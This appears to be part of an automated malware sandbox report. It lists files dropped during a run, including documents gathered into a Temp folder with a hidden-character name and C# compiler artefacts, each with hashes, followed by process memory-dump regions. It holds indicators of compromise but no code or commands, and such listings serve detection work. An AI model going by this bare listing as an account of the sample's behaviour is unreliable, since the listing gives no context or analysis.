684d5ea4dc1c6d1426932fe08475e195a59c02563bf74dfe93b89c55995275d35d6e3aadc2eb3175bcca6fcfd34627353aafaf255158d7efa1f7e1da1cd12d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\ReadSync.docx

Filesize
20KB

MD5
c0bf801933c49dea903563f66517825e

SHA1
227913179bd3646bed0cdf42787a748a3ffc816d

SHA256
72586192cec4a41e6215d59e7f916e49c7833af31d3cd28a23b7e8e183a7aa75

SHA512
18ee37596db5da2cfb606ba8ff3df31de0f0e9c399a21e5c16514cd401948a69c5c7e1b7e52e69b00813f828589fc3de0fd6a9f669621a7978732112aaa91b5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\UnblockEnable.docx

Filesize
14KB

MD5
63be03720bbb793b95210eea63259260

SHA1
feca78a9ef547e0747d7835f3e0b0d1bc743231e

SHA256
d5ec6a39f72f98d680d3fb42517c8441ff77c9089837a0ed26024fb8e2ac8bc2

SHA512
62a438f792551b479366a301794afa3a81a823617fd24aed837df91950f96519c433a3d6762baf3d3c6254aa649454859894ecbd67c3c523a455c0fc2a7e1760

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Desktop\WatchStop.docx

Filesize
14KB

MD5
54394578c951fbcaeb5918edfa0bc0b4

SHA1
7f7802755c7239729240858692e826cd24e6394a

SHA256
ce1e4c185c1b58fd4b06716b8c52c9e28c21eb848cc5e8026484438dff475e7f

SHA512
2c098cc6bf69ddbc7cc38463624528e873dbb557f702895184cdb2e415a7e06a4978bb1e31815a27b0b6a454f87befb433ec2caf5f1db40e6549c2e2d96d43f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\RegisterRequest.xls

Filesize
1.1MB

MD5
3031a74bb3c31ec19d077691aa363bf3

SHA1
cc385a91634e7e71f98f6c3e393974aad5861e95

SHA256
7f4050854e84add50a87f643d5528198405a6706ec2d249b6f621d78d039cf6d

SHA512
91cee604795ba30171f08d186c8c5e90aa9b67f421399a1d4c9c8b4a579de4fb329eb058c9999dd2f79312ed417819025eb9cb0faea7c43c62cbafa80552b60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\RenameHide.xlsx

Filesize
11KB

MD5
6afc68695e57403478b40bb5efd449c8

SHA1
4e5dcd06e708fcf7c5d47e13e9fcd8eab68cc892

SHA256
023e9f52ad182eb5c383f163886ced674b7c58e678fb73411b1f3b0d2191e484

SHA512
5219f46839894e426c8cbfcd62e8ecd300c198d4ba30e83d387e697a2043bf65ddf62f4c944bd0c8a679aa04f8c6dae971420ec4c3eae3fd225cd2d1cf4297be

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\SubmitCompress.docx

Filesize
19KB

MD5
23f255f2ec3abe082bcd02e7f4253b04

SHA1
c9249f267b9861aa83a81926ce11fb790133f051

SHA256
3d77f493b2d9a92361e8aa2e581fcba5a70e35ebcd2f566c163ff433f7604087

SHA512
25220d739dc260e1749dcfe8a26c1cf8e06339754ee36ec8efeeceb069712a68692a72eabbe63b96f5a441c30ba3e8b08636382678f16f17ec22b410e5ad1d0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌ \Common Files\Documents\WatchCompress.xlsx

Filesize
9KB

MD5
493b3b33eb05494a4480fdc8f611898b

SHA1
247baba05ff26e36ad6bd5b1965bc9236bb2346e

SHA256
c0db8b5cc4d6c4baeb14ccad890b97cd3639abe024229998a6b3f024e7ffd81e

SHA512
22a5d24a221c96f7af05e6101a16891b067731b63adc9a6a80873e9b510d12f60255fe18ff99e490711ea591c2610597f6b5134abb95d9ae0186e2e468bf2ede

Download Submit
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2344_549383123\manifest.json

Filesize
43B

MD5
af3a9104ca46f35bb5f6123d89c25966

SHA1
1ffb1b0aa9f44bdbc57bdf4b98d26d3be0207ee8

SHA256
81bd82ac27612a58be30a72dd8956b13f883e32ffb54a58076bd6a42b8afaeea

SHA512
6a7a543fa2d1ead3574b4897d2fc714bb218c60a04a70a7e92ecfd2ea59d67028f91b6a2094313f606560087336c619093f1d38d66a3c63a1d1d235ca03d36d1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0mxgobxy\0mxgobxy.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0mxgobxy\0mxgobxy.cmdline

Filesize
607B

MD5
3475ac9a17d10ce94e86b199297792f5

SHA1
db9b8d5691e2fce29b90d455c03955dc1de62889

SHA256
0256899376258b73d46aea082817d2ee86c9be42b3daafa7af299f0fdcd4be44

SHA512
5f5d31261b476e2fe58d089360817a9a30e4b403d1a0002d75b113a7fdbd6bebaf8694b5c0ef3dbf71e36e3dcc78b198a36ad351cc252199d480e37ed08dff2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0mxgobxy\CSCCBF2EEEBB76B4A6188666ACA031D866.TMP

Filesize
652B

MD5
db5790ea6e7c3d603c7a1854d9d3b746

SHA1
48acf9a34e093adb8e237b4d228b912c3e8cae44

SHA256
198c80e4e46188180421436f71f50158eab266a286b7d49939c9f4cee1230cd1

SHA512
81271639790cc03c1c08466255ce7f974086d96f9511829d85181913c9379a4f632e2110e91b5a3aaa63f84bece23c37cb33a75b0b2cd40454f0459661f2d2da

Download Submit
memory/2308-80-0x00007FF979300000-0x00007FF97930D000-memory.dmp

Filesize
52KB

Download
memory/2308-74-0x0000023DBF1F0000-0x0000023DBF719000-memory.dmp

Filesize
5.2MB

Download
memory/2308-343-0x00007FF979300000-0x00007FF97930D000-memory.dmp

Filesize
52KB

Download
memory/2308-344-0x00007FF975250000-0x00007FF97536B000-memory.dmp

Filesize
1.1MB

Download
memory/2308-330-0x00007FF964750000-0x00007FF964E14000-memory.dmp

Filesize
6.8MB

Download
memory/2308-331-0x00007FF97A730000-0x00007FF97A755000-memory.dmp

Filesize
148KB

Download
memory/2308-332-0x00007FF97B8A0000-0x00007FF97B8AF000-memory.dmp

Filesize
60KB

Download
memory/2308-333-0x00007FF97A510000-0x00007FF97A53D000-memory.dmp

Filesize
180KB

Download
memory/2308-334-0x00007FF97A690000-0x00007FF97A6AA000-memory.dmp

Filesize
104KB

Download
memory/2308-335-0x00007FF97A4E0000-0x00007FF97A504000-memory.dmp

Filesize
144KB

Download
memory/2308-336-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp

Filesize
1.5MB

Download
memory/2308-337-0x00007FF97A4C0000-0x00007FF97A4D9000-memory.dmp

Filesize
100KB

Download
memory/2308-338-0x00007FF97A4B0000-0x00007FF97A4BD000-memory.dmp

Filesize
52KB

Download
memory/2308-339-0x00007FF979330000-0x00007FF979363000-memory.dmp

Filesize
204KB

Download
memory/2308-345-0x00007FF964220000-0x00007FF964749000-memory.dmp

Filesize
5.2MB

Download
memory/2308-340-0x00007FF975540000-0x00007FF97560D000-memory.dmp

Filesize
820KB

Download
memory/2308-321-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp

Filesize
1.5MB

Download
memory/2308-315-0x00007FF964750000-0x00007FF964E14000-memory.dmp

Filesize
6.8MB

Download
memory/2308-316-0x00007FF97A730000-0x00007FF97A755000-memory.dmp

Filesize
148KB

Download
memory/2308-296-0x00007FF964220000-0x00007FF964749000-memory.dmp

Filesize
5.2MB

Download
memory/2308-295-0x0000023DBF1F0000-0x0000023DBF719000-memory.dmp

Filesize
5.2MB

Download
memory/2308-294-0x00007FF975540000-0x00007FF97560D000-memory.dmp

Filesize
820KB

Download
memory/2308-283-0x00007FF979330000-0x00007FF979363000-memory.dmp

Filesize
204KB

Download
memory/2308-26-0x00007FF964750000-0x00007FF964E14000-memory.dmp

Filesize
6.8MB

Download
memory/2308-186-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp

Filesize
1.5MB

Download
memory/2308-115-0x00007FF97A4E0000-0x00007FF97A504000-memory.dmp

Filesize
144KB

Download
memory/2308-72-0x00007FF964750000-0x00007FF964E14000-memory.dmp

Filesize
6.8MB

Download
memory/2308-75-0x00007FF964220000-0x00007FF964749000-memory.dmp

Filesize
5.2MB

Download
memory/2308-76-0x00007FF97A730000-0x00007FF97A755000-memory.dmp

Filesize
148KB

Download
memory/2308-31-0x00007FF97A730000-0x00007FF97A755000-memory.dmp

Filesize
148KB

Download
memory/2308-79-0x00007FF979310000-0x00007FF979324000-memory.dmp

Filesize
80KB

Download
memory/2308-84-0x00007FF975250000-0x00007FF97536B000-memory.dmp

Filesize
1.1MB

Download
memory/2308-81-0x00007FF97A510000-0x00007FF97A53D000-memory.dmp

Filesize
180KB

Download
memory/2308-73-0x00007FF975540000-0x00007FF97560D000-memory.dmp

Filesize
820KB

Download
memory/2308-342-0x00007FF979310000-0x00007FF979324000-memory.dmp

Filesize
80KB

Download
memory/2308-68-0x00007FF979330000-0x00007FF979363000-memory.dmp

Filesize
204KB

Download
memory/2308-66-0x00007FF97A4B0000-0x00007FF97A4BD000-memory.dmp

Filesize
52KB

Download
memory/2308-64-0x00007FF97A4C0000-0x00007FF97A4D9000-memory.dmp

Filesize
100KB

Download
memory/2308-62-0x00007FF9759E0000-0x00007FF975B5F000-memory.dmp

Filesize
1.5MB

Download
memory/2308-60-0x00007FF97A4E0000-0x00007FF97A504000-memory.dmp

Filesize
144KB

Download
memory/2308-58-0x00007FF97A690000-0x00007FF97A6AA000-memory.dmp

Filesize
104KB

Download
memory/2308-56-0x00007FF97A510000-0x00007FF97A53D000-memory.dmp

Filesize
180KB

Download
memory/2308-50-0x00007FF97B8A0000-0x00007FF97B8AF000-memory.dmp

Filesize
60KB

Download
memory/4204-90-0x000001BAC3D30000-0x000001BAC3D52000-memory.dmp

Filesize
136KB

Download
memory/4604-210-0x0000013432A60000-0x0000013432A68000-memory.dmp

Filesize
32KB

Download